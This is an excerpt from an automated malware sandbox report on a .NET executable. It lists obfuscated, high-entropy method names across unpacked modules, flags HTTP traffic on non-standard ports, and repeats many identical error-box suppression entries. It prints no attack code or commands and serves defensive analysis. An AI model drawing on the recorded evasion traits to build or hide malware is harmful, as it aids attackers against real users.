Source: 0.2.ljMiHZ8MwZ.exe.432ec78.3.raw.unpack, oxFBU42wJTr2UTVcBS.cs	High entropy of concatenated method names: 'gdZWZTamEN', 'cYxWGfDJ6P', 'rqsWvqG85K', 'Q24WMioCkT', 'rNOW5G1gr6', 'jSLWrW6foE', 'SR2WsFrbym', 'hWXW8tYt4w', 'JI0WPWFWqv', 'lU8Wh0W6ir'
Source: 0.2.ljMiHZ8MwZ.exe.432ec78.3.raw.unpack, qGWQwo3dZPjlkLfaXEb.cs	High entropy of concatenated method names: 'YktuhfmIYi', 'LD9uzApOq9', 'e62bXRuxUF', 'wm5bICyysQdvmS0Q4XK', 'z8lOOUyLLHyT7DMV13X', 'bHiac7yXndI6kdjUemP', 'hl7PP7yYada2wJVpExC'
Source: 0.2.ljMiHZ8MwZ.exe.432ec78.3.raw.unpack, UFuoQeCdlpIA3uNJJl.cs	High entropy of concatenated method names: 'vDVamV7Xnr', 'vJOag5ovPb', 'JaoapdFwQR', 'D7QphduMc9', 'I2ipzGUjRU', 'gt4aXushGK', 'gITa3pQxCc', 'UwGaKQRs84', 'acQadBXrkB', 'SoUaRkv0wZ'
Source: 0.2.ljMiHZ8MwZ.exe.432ec78.3.raw.unpack, fRMpebh3HnJSGfKfL5.cs	High entropy of concatenated method names: 'ALF7gxHoIM', 'aPJ7DUGyTh', 'zHi7pDRhFN', 'KDK7aqetw2', 'dLQ7Hk0QyX', 'Sg079EB4Xj', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.ljMiHZ8MwZ.exe.432ec78.3.raw.unpack, qBd4H5tgmR5ZnW4Vei.cs	High entropy of concatenated method names: 'SutDAJlYvu', 'ROiDTD7a6p', 'mTmgouYxdA', 'L8LgkWOIJ0', 'W3Ag4urpy0', 'DrNgfaG3pJ', 'YTHgCpg8YQ', 'DeXgBstkRy', 'pSJgNqq9kK', 'CsugYjNTct'
Source: 0.2.ljMiHZ8MwZ.exe.432ec78.3.raw.unpack, EuOpUCriLBxCLqaAMU.cs	High entropy of concatenated method names: 'vOfU8JiVtS', 'kejUh5P7hq', 'SsmeXP6x2t', 'QJie3NWrSU', 'GF1USGkmOm', 'WiyUJ3iYo2', 'WsjULLBDQN', 'kxpUZuaE8e', 'h6cUGQhmVq', 'hBvUvt1s7r'
Source: 0.2.ljMiHZ8MwZ.exe.432ec78.3.raw.unpack, CmxdKqWHRvJdY9P2C6.cs	High entropy of concatenated method names: 'Dispose', 'dsu3PnRk5t', 'rm3KI9Ogld', 'Qc9iynxKxx', 'xPb3h5Y0G1', 'lEh3zmDCB4', 'ProcessDialogKey', 'BLgKX3TbBg', 'bWJK3M3k3G', 'fXIKKmRMpe'
Source: 0.2.ljMiHZ8MwZ.exe.432ec78.3.raw.unpack, KxSlmh3RWIExw3kFaGD.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'z08bHsNTZt', 'ecEb7Gibds', 'qkVbu8Vsq1', 'yOpbbc5rbG', 'kJ0bQvpgRT', 'eCebiuG1RS', 'ywtbnw3DD6'
Source: 0.2.ljMiHZ8MwZ.exe.432ec78.3.raw.unpack, xGWxxQzs6QMPuKRFe2.cs	High entropy of concatenated method names: 'Aa47OyMdV0', 'LFy72Jn1d0', 'K3o7xmxHL9', 'n0x7jyVL10', 'TvY7ICrcs6', 'TgC7kWqNRO', 'DvN74adREW', 'pbF7nn2tWa', 'QTQ7wEuCWn', 'VlA7FUj0xI'
Source: 0.2.ljMiHZ8MwZ.exe.432ec78.3.raw.unpack, biOSFH33IeY62QRJA5u.cs	High entropy of concatenated method names: 'QlJ7hp51tX', 'MG57zf7uE8', 'JcnuXUOOQD', 'fA8u3qOCi4', 'FSLuKS6IhR', 'rOoudh4wZt', 'ITfuRayqui', 'inZulFFGL1', 'jZNumyFrVi', 'b7UuWxWnYF'
Source: 0.2.ljMiHZ8MwZ.exe.432ec78.3.raw.unpack, G5HkYS3K1F7W131Parx.cs	High entropy of concatenated method names: 'ToString', 'VWUu29M9nH', 'MVbuxhGMUF', 'iJ8utawXTD', 'JRLujRBLdW', 'qDkuIy5ybl', 'jxiuo8mK8k', 'wY9ukYXNFp', 'P7KdVQyQjg5MX7td4nQ', 'tHGhUAyF7lc1PN7P3jK'
Source: 0.2.ljMiHZ8MwZ.exe.432ec78.3.raw.unpack, qYwR0TMDtDIN8pqpVU.cs	High entropy of concatenated method names: 'BD7U66QRgG', 'nAxUqfollF', 'ToString', 'wlwUm64e64', 'mhHUWUVW0m', 'zHcUgC0Lhx', 'rNTUDVxSBj', 'FU6UpWpA6U', 'FBeUas9IZb', 'a0oU99NcCK'
Source: 0.2.ljMiHZ8MwZ.exe.432ec78.3.raw.unpack, LXtXutRj3L0weLOGZY.cs	High entropy of concatenated method names: 'F8c3axFBU4', 'xJT39r2UTV', 'eGN364ahiv', 'us03qOUBd4', 'g4V3VeivHo', 'mSo31uYakG', 'yxG1MyehurFOIaCjcr', 'QK6o1mHaIraxp3BFvG', 'Fv933fjTu5', 'jX53dwsoay'
Source: 0.2.ljMiHZ8MwZ.exe.432ec78.3.raw.unpack, UeK7EHGFSG5neVbdSw.cs	High entropy of concatenated method names: 'nbNVs063IM', 'XPBV8TMQUC', 'dUEVPT2A0j', 'ht3VhZ13r1', 'p525tGkInunKOMT2f6S', 'QHQbV4kYEaXYvcxiYYR', 'bClmjgknsESuy7o594T'
Source: 0.2.ljMiHZ8MwZ.exe.432ec78.3.raw.unpack, mKU4ufKcuQsUByve7r.cs	High entropy of concatenated method names: 'VItECekKP', 'IqC0W8elS', 'UpHOa6EJf', 'P4NTtkGB1', 'IY6xDZZ3I', 'fIKtwLipq', 'w5Etjeu7NULWdSieki', 'RvXf0NPgYG12aGGDNY', 'f4ae92gPt', 'JYY7gfda3'
Source: 0.2.ljMiHZ8MwZ.exe.432ec78.3.raw.unpack, HdUXMlxGN4ahivbs0O.cs	High entropy of concatenated method names: 'uhSg0nX4tU', 'uhdgOdZPyk', 'xR2g2QEytr', 'YUtgxoWcVD', 'L7PgVvKeVs', 'XN5g1erWgM', 'CFpgUHOUVG', 'y7yge176mP', 'DaMgHipFIa', 'XNXg73fxNs'
Source: 0.2.ljMiHZ8MwZ.exe.432ec78.3.raw.unpack, YBBGBdLdRgRLbm4owH.cs	High entropy of concatenated method names: 'xJnc2OJVPr', 'HGMcxjHCrF', 'FKEcjp1Lfs', 'bDucIDDW7G', 'lDxckPRHCp', 'Kfvc47gPNf', 'GwDcC0Wj3c', 'bekcBNIuZy', 'a3ocYmRbPR', 'tpEcSZ6mhr'
Source: 0.2.ljMiHZ8MwZ.exe.432ec78.3.raw.unpack, SHo6SojuYakG6IgwZL.cs	High entropy of concatenated method names: 'KXOpl6bCye', 'd9ypW5gmQX', 'gyWpDflitr', 'qZLpap8reC', 'Xxcp9K9coy', 'kBwD5BnHfP', 'rftDrFd5BB', 'hhTDsv73gI', 'sEtD8aUT80', 'NJ7DPla2TT'
Source: 0.2.ljMiHZ8MwZ.exe.432ec78.3.raw.unpack, qyyPq296Qkh0EGin1j.cs	High entropy of concatenated method names: 'euPdl7mcaD', 'GFpdm8cMPX', 'ARXdWkGCMc', 'J1xdglQem5', 'o1rdDC7DXT', 'GfCdpo0y6C', 'TqadaJe7Qc', 'C0ad9cnMHI', 'aXfdy2Hn7t', 'AVvd6CwsdW'
Source: 0.2.ljMiHZ8MwZ.exe.432ec78.3.raw.unpack, whT9VAvWrWdOTj3EWO.cs	High entropy of concatenated method names: 'ToString', 'HV41S9wE0x', 'zBN1IqjnDN', 'aBO1otoC4M', 'Plr1ko0y1i', 'IZB14hmjai', 'j2w1fjqtJA', 'M9a1CtUvUE', 'BbA1BLpqst', 'ogf1Nkre7A'
Source: 0.2.ljMiHZ8MwZ.exe.432ec78.3.raw.unpack, Ko28UW3XlevF8QFhQ37.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'D8F7SHgxen', 'lke7Jp3es7', 'U1G7LW9wfa', 'JxR7Z5LvDG', 'Eqe7G2j9V1', 'wMK7vU1pZh', 'Mlo7MJmBYk'
Source: 0.2.ljMiHZ8MwZ.exe.432ec78.3.raw.unpack, c0npjGZVC8QoekSSiE.cs	High entropy of concatenated method names: 'oZ7VYCnT0c', 'JNAVJ2y6N2', 'BTqVZ9vKHe', 'rroVGn95O6', 'DtiVIgGoL5', 'l39VoG98lM', 'fLoVkVeIkQ', 'WcPV4I0S9L', 'mTyVffQVVl', 'muOVCunoqX'
Source: 0.2.ljMiHZ8MwZ.exe.432ec78.3.raw.unpack, bD37EoNqtrph9p0XKi.cs	High entropy of concatenated method names: 'ELqaw0Q2pj', 'sKiaFEIPPu', 'ahvaEBSRyN', 'YSVa0Z019T', 'CtZaAwGRaF', 'hXiaOM8Ifk', 'cQaaTGXP8U', 'z1Ha2oD9Jw', 'BdPax0uMoO', 'yk7at26fk1'
Source: 0.2.ljMiHZ8MwZ.exe.42d2a58.0.raw.unpack, fveyHcscgRsunRk5tw.cs	High entropy of concatenated method names: 'OdIHVklGB7', 'A0hHUGFMQ8', 'di7HHgDVU3', 'WPhHuZdIF0', 'jecHQtuy81', 'S8EHnCMkGg', 'Dispose', 'LaqemtE7ag', 'lEmeWMFu5u', 'wvpeg8N1fq'
Source: 0.2.ljMiHZ8MwZ.exe.42d2a58.0.raw.unpack, h3TbBgPKWJM3k3GmXI.cs	High entropy of concatenated method names: 'Bv0Hj9P4vN', 'PoCHI7bXh9', 'tP0HorBdxk', 'IZFHkKqDSB', 'UFwH4dBZ5o', 'ogmHfMfU7I', 'tblHCCM6eU', 'nwbHBP7FxE', 'SsyHNnx5Wn', 'DvtHYPC36J'
Source: 0.2.ljMiHZ8MwZ.exe.42d2a58.0.raw.unpack, oxFBU42wJTr2UTVcBS.cs	High entropy of concatenated method names: 'gdZWZTamEN', 'cYxWGfDJ6P', 'rqsWvqG85K', 'Q24WMioCkT', 'rNOW5G1gr6', 'jSLWrW6foE', 'SR2WsFrbym', 'hWXW8tYt4w', 'JI0WPWFWqv', 'lU8Wh0W6ir'
Source: 0.2.ljMiHZ8MwZ.exe.42d2a58.0.raw.unpack, qGWQwo3dZPjlkLfaXEb.cs	High entropy of concatenated method names: 'YktuhfmIYi', 'LD9uzApOq9', 'e62bXRuxUF', 'wm5bICyysQdvmS0Q4XK', 'z8lOOUyLLHyT7DMV13X', 'bHiac7yXndI6kdjUemP', 'hl7PP7yYada2wJVpExC'
Source: 0.2.ljMiHZ8MwZ.exe.42d2a58.0.raw.unpack, UFuoQeCdlpIA3uNJJl.cs	High entropy of concatenated method names: 'vDVamV7Xnr', 'vJOag5ovPb', 'JaoapdFwQR', 'D7QphduMc9', 'I2ipzGUjRU', 'gt4aXushGK', 'gITa3pQxCc', 'UwGaKQRs84', 'acQadBXrkB', 'SoUaRkv0wZ'
Source: 0.2.ljMiHZ8MwZ.exe.42d2a58.0.raw.unpack, fRMpebh3HnJSGfKfL5.cs	High entropy of concatenated method names: 'ALF7gxHoIM', 'aPJ7DUGyTh', 'zHi7pDRhFN', 'KDK7aqetw2', 'dLQ7Hk0QyX', 'Sg079EB4Xj', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.ljMiHZ8MwZ.exe.42d2a58.0.raw.unpack, qBd4H5tgmR5ZnW4Vei.cs	High entropy of concatenated method names: 'SutDAJlYvu', 'ROiDTD7a6p', 'mTmgouYxdA', 'L8LgkWOIJ0', 'W3Ag4urpy0', 'DrNgfaG3pJ', 'YTHgCpg8YQ', 'DeXgBstkRy', 'pSJgNqq9kK', 'CsugYjNTct'
Source: 0.2.ljMiHZ8MwZ.exe.42d2a58.0.raw.unpack, EuOpUCriLBxCLqaAMU.cs	High entropy of concatenated method names: 'vOfU8JiVtS', 'kejUh5P7hq', 'SsmeXP6x2t', 'QJie3NWrSU', 'GF1USGkmOm', 'WiyUJ3iYo2', 'WsjULLBDQN', 'kxpUZuaE8e', 'h6cUGQhmVq', 'hBvUvt1s7r'
Source: 0.2.ljMiHZ8MwZ.exe.42d2a58.0.raw.unpack, CmxdKqWHRvJdY9P2C6.cs	High entropy of concatenated method names: 'Dispose', 'dsu3PnRk5t', 'rm3KI9Ogld', 'Qc9iynxKxx', 'xPb3h5Y0G1', 'lEh3zmDCB4', 'ProcessDialogKey', 'BLgKX3TbBg', 'bWJK3M3k3G', 'fXIKKmRMpe'
Source: 0.2.ljMiHZ8MwZ.exe.42d2a58.0.raw.unpack, KxSlmh3RWIExw3kFaGD.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'z08bHsNTZt', 'ecEb7Gibds', 'qkVbu8Vsq1', 'yOpbbc5rbG', 'kJ0bQvpgRT', 'eCebiuG1RS', 'ywtbnw3DD6'
Source: 0.2.ljMiHZ8MwZ.exe.42d2a58.0.raw.unpack, xGWxxQzs6QMPuKRFe2.cs	High entropy of concatenated method names: 'Aa47OyMdV0', 'LFy72Jn1d0', 'K3o7xmxHL9', 'n0x7jyVL10', 'TvY7ICrcs6', 'TgC7kWqNRO', 'DvN74adREW', 'pbF7nn2tWa', 'QTQ7wEuCWn', 'VlA7FUj0xI'
Source: 0.2.ljMiHZ8MwZ.exe.42d2a58.0.raw.unpack, biOSFH33IeY62QRJA5u.cs	High entropy of concatenated method names: 'QlJ7hp51tX', 'MG57zf7uE8', 'JcnuXUOOQD', 'fA8u3qOCi4', 'FSLuKS6IhR', 'rOoudh4wZt', 'ITfuRayqui', 'inZulFFGL1', 'jZNumyFrVi', 'b7UuWxWnYF'
Source: 0.2.ljMiHZ8MwZ.exe.42d2a58.0.raw.unpack, G5HkYS3K1F7W131Parx.cs	High entropy of concatenated method names: 'ToString', 'VWUu29M9nH', 'MVbuxhGMUF', 'iJ8utawXTD', 'JRLujRBLdW', 'qDkuIy5ybl', 'jxiuo8mK8k', 'wY9ukYXNFp', 'P7KdVQyQjg5MX7td4nQ', 'tHGhUAyF7lc1PN7P3jK'
Source: 0.2.ljMiHZ8MwZ.exe.42d2a58.0.raw.unpack, qYwR0TMDtDIN8pqpVU.cs	High entropy of concatenated method names: 'BD7U66QRgG', 'nAxUqfollF', 'ToString', 'wlwUm64e64', 'mhHUWUVW0m', 'zHcUgC0Lhx', 'rNTUDVxSBj', 'FU6UpWpA6U', 'FBeUas9IZb', 'a0oU99NcCK'
Source: 0.2.ljMiHZ8MwZ.exe.42d2a58.0.raw.unpack, LXtXutRj3L0weLOGZY.cs	High entropy of concatenated method names: 'F8c3axFBU4', 'xJT39r2UTV', 'eGN364ahiv', 'us03qOUBd4', 'g4V3VeivHo', 'mSo31uYakG', 'yxG1MyehurFOIaCjcr', 'QK6o1mHaIraxp3BFvG', 'Fv933fjTu5', 'jX53dwsoay'
Source: 0.2.ljMiHZ8MwZ.exe.42d2a58.0.raw.unpack, UeK7EHGFSG5neVbdSw.cs	High entropy of concatenated method names: 'nbNVs063IM', 'XPBV8TMQUC', 'dUEVPT2A0j', 'ht3VhZ13r1', 'p525tGkInunKOMT2f6S', 'QHQbV4kYEaXYvcxiYYR', 'bClmjgknsESuy7o594T'
Source: 0.2.ljMiHZ8MwZ.exe.42d2a58.0.raw.unpack, mKU4ufKcuQsUByve7r.cs	High entropy of concatenated method names: 'VItECekKP', 'IqC0W8elS', 'UpHOa6EJf', 'P4NTtkGB1', 'IY6xDZZ3I', 'fIKtwLipq', 'w5Etjeu7NULWdSieki', 'RvXf0NPgYG12aGGDNY', 'f4ae92gPt', 'JYY7gfda3'
Source: 0.2.ljMiHZ8MwZ.exe.42d2a58.0.raw.unpack, HdUXMlxGN4ahivbs0O.cs	High entropy of concatenated method names: 'uhSg0nX4tU', 'uhdgOdZPyk', 'xR2g2QEytr', 'YUtgxoWcVD', 'L7PgVvKeVs', 'XN5g1erWgM', 'CFpgUHOUVG', 'y7yge176mP', 'DaMgHipFIa', 'XNXg73fxNs'
Source: 0.2.ljMiHZ8MwZ.exe.42d2a58.0.raw.unpack, YBBGBdLdRgRLbm4owH.cs	High entropy of concatenated method names: 'xJnc2OJVPr', 'HGMcxjHCrF', 'FKEcjp1Lfs', 'bDucIDDW7G', 'lDxckPRHCp', 'Kfvc47gPNf', 'GwDcC0Wj3c', 'bekcBNIuZy', 'a3ocYmRbPR', 'tpEcSZ6mhr'
Source: 0.2.ljMiHZ8MwZ.exe.42d2a58.0.raw.unpack, SHo6SojuYakG6IgwZL.cs	High entropy of concatenated method names: 'KXOpl6bCye', 'd9ypW5gmQX', 'gyWpDflitr', 'qZLpap8reC', 'Xxcp9K9coy', 'kBwD5BnHfP', 'rftDrFd5BB', 'hhTDsv73gI', 'sEtD8aUT80', 'NJ7DPla2TT'
Source: 0.2.ljMiHZ8MwZ.exe.42d2a58.0.raw.unpack, qyyPq296Qkh0EGin1j.cs	High entropy of concatenated method names: 'euPdl7mcaD', 'GFpdm8cMPX', 'ARXdWkGCMc', 'J1xdglQem5', 'o1rdDC7DXT', 'GfCdpo0y6C', 'TqadaJe7Qc', 'C0ad9cnMHI', 'aXfdy2Hn7t', 'AVvd6CwsdW'
Source: 0.2.ljMiHZ8MwZ.exe.42d2a58.0.raw.unpack, whT9VAvWrWdOTj3EWO.cs	High entropy of concatenated method names: 'ToString', 'HV41S9wE0x', 'zBN1IqjnDN', 'aBO1otoC4M', 'Plr1ko0y1i', 'IZB14hmjai', 'j2w1fjqtJA', 'M9a1CtUvUE', 'BbA1BLpqst', 'ogf1Nkre7A'
Source: 0.2.ljMiHZ8MwZ.exe.42d2a58.0.raw.unpack, Ko28UW3XlevF8QFhQ37.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'D8F7SHgxen', 'lke7Jp3es7', 'U1G7LW9wfa', 'JxR7Z5LvDG', 'Eqe7G2j9V1', 'wMK7vU1pZh', 'Mlo7MJmBYk'
Source: 0.2.ljMiHZ8MwZ.exe.42d2a58.0.raw.unpack, c0npjGZVC8QoekSSiE.cs	High entropy of concatenated method names: 'oZ7VYCnT0c', 'JNAVJ2y6N2', 'BTqVZ9vKHe', 'rroVGn95O6', 'DtiVIgGoL5', 'l39VoG98lM', 'fLoVkVeIkQ', 'WcPV4I0S9L', 'mTyVffQVVl', 'muOVCunoqX'
Source: 0.2.ljMiHZ8MwZ.exe.42d2a58.0.raw.unpack, bD37EoNqtrph9p0XKi.cs	High entropy of concatenated method names: 'ELqaw0Q2pj', 'sKiaFEIPPu', 'ahvaEBSRyN', 'YSVa0Z019T', 'CtZaAwGRaF', 'hXiaOM8Ifk', 'cQaaTGXP8U', 'z1Ha2oD9Jw', 'BdPax0uMoO', 'yk7at26fk1'

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49737

Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
